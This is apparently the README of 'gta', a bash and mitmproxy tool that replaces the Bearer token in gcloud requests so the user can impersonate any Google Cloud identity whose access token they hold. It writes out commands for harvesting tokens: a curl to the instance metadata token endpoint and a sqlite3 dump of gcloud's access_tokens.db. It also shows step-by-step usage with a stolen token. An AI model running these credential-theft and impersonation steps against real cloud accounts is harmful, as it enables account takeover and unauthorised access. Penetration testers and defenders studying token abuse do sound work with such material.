This tool can be used to impersonate anyone given its access token. I have not found a built-in way to do this with gcloud cli.
The tool is very simple : It just proxifies gcloud tool with python3 library mitmproxy, and replace the Bearer token by the one specified in the tool.
It requires to be first logged with ANY account on gcloud so the gcloud tool does not complain. The chosen account has no importance.
You can find juicy access token in GCE/GKE instances metadata, in /home/USER/.config/gcloud/access_tokens.db, and in many other places !
$ curl http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$SERVICE_ACCOUNT/token -H 'Metadata-Flavor: Google'
$ sqlite3 /home/$USER/.config/gcloud/access_tokens.db "select access_token from access_tokens;"This security tool is a work in progress.
There is no real installation, as it is a bash cli. Just some requirements :
- gcloud
- python3
- mitmproxy python3 library
$ pip3 install mitmproxy
$ export PATH=$PATH:/path/to/gtaFirst login in gcloud with ANY account, it doesn't matter
$ gcloud auth login
Then you can use gta ! Just set token (and port is you do not want default 8080) Whenever you execute a gcloud command, the configuration will be refreshed if any setting has changed
Basic Usage :
gta> set token ya29.[...skip...]
gta> start
gta> gcloud iam service-accounts list --project PROJECT
gta> stopAdvanced usage :
gta> set token ya29.[...skip...]
gta> set project mygcpproject
gta> set port 4444
gta> start
gta> gcloud iam service-accounts list
gta> stopPlease see CHANGELOG for more information on what has changed recently.
No testing yet
Please see CONTRIBUTING and CODE_OF_CONDUCT for details.
If you discover any security related issues, please email thibault.lengagne59@gmail.com instead of using the issue tracker.
- Thibault Lengagne
The MIT License (MIT). Please see License File for more information.